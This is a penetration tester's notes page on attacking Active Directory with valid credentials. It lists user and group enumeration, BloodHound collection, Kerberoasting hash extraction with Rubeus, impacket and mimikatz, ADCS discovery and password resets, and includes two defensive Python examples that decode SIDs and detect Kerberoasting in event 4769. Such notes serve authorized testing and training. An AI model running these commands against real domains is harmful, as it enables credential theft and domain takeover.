# Valid Credentials

## Enumeration

### Using Windows Legacy Tools

```
net user /domain
net user <USERNAME> /domain
net group /domain
net group "<GROUP>" /domain
```

### PowerView

**Get Domain Information**

```
Get-NetDomain
```

**Get User List**

```
Get-NetUser
```

**Get a specific User**

```
Get-NetUser "user"
```

**Enumerate Password Last Set and Last Logon**

```
Get-NetUser | select cn,pwdlastset,lastlogon
```

**Get Groups**

```
Get-NetGroup
```

**Get a specific Group**

```
Get-NetGroup "Domain Admins"
```

**Get Members of groups**

```
Get-NetGroup "Domain Admins" | select member
```

**List Domain Shares**

```
Find-DomainShare
```

**Get Computer Objects**

```
Get-NetComputer
Get-NetComputer | select operatingsystem,dnshostname
```

**Check if we are ADMIN on other Computers**

```
Find-LocalAdminAccess
```

**Check for Logged Users**

```
Get-NetSession -ComputerName files04 -Verbose
.\PsLoggedon.exe
```

**Enumerate ACL**

```
Get-ObjectAcl -Identity "user"
```

In order to make sense of the SID, we can use PowerView's **Convert-SidToName** command to convert it to an actual domain object name:

```
Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104

"S-1-5-21-1987370270-658905905-1781884369-512","S-1-5-21-1987370270-658905905-1781884369-1104","S-1-5-32-548","S-1-5-18","S-1-5-21-1987370270-658905905-1781884369-519" | Convert-SidToName
```
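Convert-SidToName needs a live domain connection, but a good part of an ACL review can be done offline: the structure of a SID tells you whether an ACE belongs to a well-known principal (BUILTIN group, SYSTEM, Domain Admins) or to a custom object that still has to be resolved. The following is an added example for this page, not PowerView code; it parses the SIDs shown above, resolves names from Microsoft's documented well-known RID and SID tables (the lists below are a constructed subset), and reports which trustees are high-value and which still need Convert-SidToName.

```python
"""Decode Windows SIDs such as the ones Get-ObjectAcl returns.

Added example for this page; it is not PowerView code.  It resolves names
only from Microsoft's documented well-known RIDs and SIDs, so domain objects
with RID >= 1000 (users, groups, computers created in the domain) still need
Convert-SidToName against the domain.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Well-known domain-relative RIDs (same in every domain); subset for the example.
WELL_KNOWN_RIDS = {
    500: "Administrator",
    501: "Guest",
    502: "krbtgt",
    512: "Domain Admins",
    513: "Domain Users",
    515: "Domain Computers",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
    520: "Group Policy Creator Owners",
}

# Well-known absolute SIDs (BUILTIN aliases and NT AUTHORITY principals); subset.
WELL_KNOWN_SIDS = {
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-548": "BUILTIN\\Account Operators",
    "S-1-5-32-551": "BUILTIN\\Backup Operators",
}

# Principals whose ACEs on an object deserve a second look in an audit.
HIGH_VALUE = {
    "Administrator", "Domain Admins", "Enterprise Admins", "Schema Admins",
    "NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators",
    "BUILTIN\\Account Operators", "BUILTIN\\Backup Operators",
}


@dataclass(frozen=True)
class ParsedSid:
    sid: str
    domain_sid: Optional[str]  # S-1-5-21-<a>-<b>-<c> for domain principals, else None
    rid: Optional[int]         # trailing relative identifier for domain principals
    name: Optional[str]        # resolved from the tables above, None if unknown
    high_value: bool


def parse_sid(sid: str) -> ParsedSid:
    parts = sid.strip().split("-")
    if len(parts) < 3 or parts[0].upper() != "S":
        raise ValueError(f"not a SID: {sid!r}")
    try:
        revision, authority = int(parts[1]), int(parts[2])
        subs = tuple(int(p) for p in parts[3:])
    except ValueError:
        raise ValueError(f"not a SID: {sid!r}") from None
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")

    name = WELL_KNOWN_SIDS.get(sid)
    domain_sid = rid = None
    # Domain SIDs look like S-1-5-21-<a>-<b>-<c>; domain principals append one RID.
    if authority == 5 and subs[:1] == (21,) and len(subs) in (4, 5):
        domain_sid = "S-1-5-21-" + "-".join(str(s) for s in subs[1:4])
        if len(subs) == 5:
            rid = subs[4]
            name = name or WELL_KNOWN_RIDS.get(rid)
    return ParsedSid(sid, domain_sid, rid, name, name in HIGH_VALUE)


def triage(sids: List[str]) -> Tuple[List[str], List[str]]:
    """Split SIDs into high-value principals and SIDs that still need resolving."""
    parsed = [parse_sid(s) for s in sids]
    high = [p.sid for p in parsed if p.high_value]
    unresolved = [p.sid for p in parsed if p.name is None]
    return high, unresolved


if __name__ == "__main__":
    # The five SIDs from the Convert-SidToName example above.
    sample = [
        "S-1-5-21-1987370270-658905905-1781884369-512",
        "S-1-5-21-1987370270-658905905-1781884369-1104",
        "S-1-5-32-548",
        "S-1-5-18",
        "S-1-5-21-1987370270-658905905-1781884369-519",
    ]
    for s in sample:
        p = parse_sid(s)
        print(f"{s:50} rid={p.rid} name={p.name} high_value={p.high_value}")
```

Only the `-1104` entry comes back unresolved, which is exactly the one that needs Convert-SidToName; the other four are well-known principals whose presence in an ACL is expected (SYSTEM, Domain Admins, Enterprise Admins, Account Operators).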

**Enumerate GenericAll in the domain**

```
Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
```

**Enumerate SPN**

```
Get-NetUser -SPN | select samaccountname,serviceprincipalname
```

### Service Principal Name (SPN) Enumeration

```
setspn -L iis_service
nslookup.exe <RHOST>
```

## Get all the users

{% tabs %}
{% tab title="GetADUsers" %}

```
GetADUsers.py -all -dc-ip <dc-ip> <domain>/<username>
```

{% endtab %}

{% tab title="cme" %}

{% code overflow="wrap" %}

```
cme smb <ip> -u <user> -p <password> --users

cme smb <ip> -u <user> -p <password> --users | awk '{print $5}' | grep -v '\[' | grep -v '-Username-'
```

{% endcode %}

{% endtab %}

{% tab title="rpcclient" %}

```
rpcclient -U <user> <ip>
rpcclient > enumdomusers
```

{% endtab %}

{% tab title="Windows" %}

```
Get-LocalUser
```

{% endtab %}

{% tab title="windapsearch" %}

```
python3 windapsearch.py --dc-ip DCIP -u user -p password --da
```

{% endtab %}
{% endtabs %}

## Enumerate SMB Shares

{% tabs %}
{% tab title="cme" %}

```
cme smb <ip> -u <user> -p <password> --shares
```

{% endtab %}
{% endtabs %}

## BloodHound

{% tabs %}
{% tab title="Python" %}

```
bloodhound-python -d <domain> -u <user> -p <password> -ns <dc-ip> -c all
```

{% endtab %}

{% tab title="RustHound" %}

```
./rusthound -d <domain> -u '<user>@<domain>' -p <password> -o <outfile> -z
```

{% endtab %}

{% tab title="SharpHound.ps1" %}
[SharpHound.ps1](https://raw.githubusercontent.com/RedTeamMagic/Powershell/refs/heads/main/SharpHound.ps1)

```
powershell -ep bypass
. .\SharpHound.ps1
Invoke-Bloodhound -collectionmethod all
```

{% endtab %}

{% tab title="SharpHound" %}

```
sharphound.exe -c all -d <domain>
```

{% endtab %}
{% endtabs %}

## Kerberoasting

### Get Kerberoastable users

{% tabs %}
{% tab title="PowerView" %}

```
Get-DomainUser -SPN -Properties SamAccountName,ServicePrincipalName
```

{% endtab %}

{% tab title="BloodHound" %}
{% code overflow="wrap" %}

```
MATCH (u:User {hasspn:true}) RETURN u

MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p
```

{% endcode %}
{% endtab %}
{% endtabs %}

### Get Hash

{% tabs %}
{% tab title="impacket-GetUserSPNs" %}

```
sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 <domain/user>
```

If impacket-GetUserSPNs throws the error "KRB\_AP\_ERR\_SKEW(Clock skew too great)," we need to synchronize the time of the Kali machine with the domain controller. We can use [*rdate*](https://en.wikipedia.org/wiki/Rdate) to do so.

```
rdate -n [IP of Target]
```

{% endtab %}

{% tab title="PowerView" %}
{% code overflow="wrap" %}

```
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\tgs.csv -NoTypeInformation
```

{% endcode %}
{% endtab %}

{% tab title="Rubeus" %}

```
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
```

**Find kerberoastable administrators (accounts with adminCount=1)**

```
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
```

{% endtab %}

{% tab title="mimikatz" %}

```
mimikatz # base64 /out:true
mimikatz # kerberos::list /export
```

{% endtab %}
{% endtabs %}
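Every ticket request made by the tools above is logged on the domain controller as Security event 4769 (a Kerberos service ticket was requested), which is where a blue team spots this activity. The following is an added detection example, not part of Rubeus, impacket or PowerView: a sliding-window heuristic that flags an account requesting tickets for many distinct user-held SPNs within a few minutes, and separately reports RC4 (TicketEncryptionType 0x17) requests, the encryption type that makes the resulting hash cheap to crack. Field names follow the real 4769 event (TargetUserName, ServiceName, TicketEncryptionType, IpAddress); the pipe-delimited record layout, the account names and the IPs are constructed for the example.

```python
"""Kerberoasting detection over Windows Security event 4769 records.

Added example for this page: a sliding-window heuristic over constructed
records, not part of any of the tools in the tabs above.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # TicketEncryptionType for RC4-HMAC; AES types are 0x11/0x12

# Constructed sample records: timestamp|TargetUserName|ServiceName|TicketEncryptionType|IpAddress
SAMPLE_4769 = """\
2024-05-01T10:00:05|alice@CORP.LOCAL|krbtgt|0x12|10.0.0.25
2024-05-01T10:00:10|alice@CORP.LOCAL|iis_service|0x17|10.0.0.25
2024-05-01T10:00:11|alice@CORP.LOCAL|sqlsvc|0x17|10.0.0.25
2024-05-01T10:00:12|alice@CORP.LOCAL|backupsvc|0x17|10.0.0.25
2024-05-01T10:00:13|alice@CORP.LOCAL|svc_sccm|0x17|10.0.0.25
2024-05-01T10:00:14|alice@CORP.LOCAL|svc_ad|0x17|10.0.0.25
2024-05-01T10:00:15|alice@CORP.LOCAL|FILES04$|0x12|10.0.0.25
2024-05-01T10:02:00|bob@CORP.LOCAL|sqlsvc|0x12|10.0.0.31
2024-05-01T10:03:00|carol@CORP.LOCAL|FILES04$|0x12|10.0.0.40
"""


def parse_events(text):
    """Parse the constructed pipe-delimited records into dicts, oldest first."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, user, svc, etype, ip = line.split("|")
        events.append({"ts": datetime.fromisoformat(ts), "user": user, "svc": svc,
                       "etype": int(etype, 16), "ip": ip})
    return sorted(events, key=lambda e: e["ts"])


def is_roastable_target(svc):
    # Kerberoasting asks for tickets to SPNs held by user accounts.  The TGS
    # itself (krbtgt) and computer accounts (trailing '$', random 120-char
    # passwords) are normal traffic and only add noise to the count.
    return svc.lower() != "krbtgt" and not svc.endswith("$")


def detect_kerberoast(events, threshold=5, window=timedelta(minutes=5)):
    """Return {account: alert} for accounts that requested tickets for at least
    `threshold` distinct user-held SPNs inside any `window`-long interval."""
    alerts = {}
    recent = defaultdict(deque)  # account -> (ts, svc) pairs inside the window
    rc4 = defaultdict(set)       # account -> SPNs it obtained RC4 tickets for
    for ev in events:
        if not is_roastable_target(ev["svc"]):
            continue
        q = recent[ev["user"]]
        q.append((ev["ts"], ev["svc"]))
        while q and ev["ts"] - q[0][0] > window:
            q.popleft()
        if ev["etype"] == RC4_HMAC:
            rc4[ev["user"]].add(ev["svc"])
        distinct = {svc for _, svc in q}
        if len(distinct) >= threshold and ev["user"] not in alerts:
            alerts[ev["user"]] = {
                "services": sorted(distinct),
                "rc4_services": sorted(rc4[ev["user"]]),
                "first_seen": q[0][0],
                "last_seen": ev["ts"],
                "source_ip": ev["ip"],
            }
    return alerts


def rc4_requesters(events):
    """Accounts that obtained RC4 tickets for user-held SPNs: in a domain where
    service accounts support AES, a single one of these is worth a look."""
    return {ev["user"] for ev in events
            if ev["etype"] == RC4_HMAC and is_roastable_target(ev["svc"])}


if __name__ == "__main__":
    evs = parse_events(SAMPLE_4769)
    for user, a in detect_kerberoast(evs).items():
        print(f"{user}: {len(a['services'])} SPNs between {a['first_seen']:%H:%M:%S} "
              f"and {a['last_seen']:%H:%M:%S} from {a['source_ip']}, RC4 for {a['rc4_services']}")
    print("RC4 requesters:", sorted(rc4_requesters(evs)))
```

On the constructed records only `alice` trips the rule (five distinct SPNs in four seconds, all RC4); `bob`'s single AES request to `sqlsvc` and the computer-account requests are left alone. The threshold and window are starting points to tune against a baseline of the domain's normal ticket volume; the RC4 indicator is the more precise one where AES is enforced on service accounts.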

#### [hash-cracking](https://m4rcg04m.gitbook.io/m4rcg04m/notes/explotation/password-attacks/hash-cracking "mention")

## ADCS Enumeration <a href="#adcs-enumeration" id="adcs-enumeration"></a>

{% tabs %}
{% tab title="certipy" %}

```
certipy-ad find -username 'user' -password 'password' -dc-ip <IP>
```

{% endtab %}

{% tab title="netexec" %}

```
netexec ldap domain.lab -u username -p password -M adcs
```

{% endtab %}
{% endtabs %}

#### [active-directory-certificate-services-ad-cs](https://m4rcg04m.gitbook.io/m4rcg04m/notes/active-directory/active-directory-certificate-services-ad-cs "mention")

## Exploit

If we find known vulnerabilities, we should exploit them to compromise more systems:

[known-vulnerabilities](https://m4rcg04m.gitbook.io/m4rcg04m/notes/active-directory/known-vulnerabilities "mention")

## Connect to computers

[lateral-move](https://m4rcg04m.gitbook.io/m4rcg04m/notes/active-directory/lateral-move "mention")

## WinPeas

Upload WinPEAS for more in-depth enumeration.

## LDAP

```
ldapsearch -x -H ldap://<domain> -D '<user>@<domain>' -w '<password>' \
  -b "dc=support,dc=htb" "(objectClass=*)"
```

## Change User Password

If we get **"STATUS\_PASSWORD\_MUST\_CHANGE"** for some users, the current password is accepted but must be changed before it can be used; we can set a new one with smbpasswd:

```
smbpasswd -r <ip> -U <username>
```
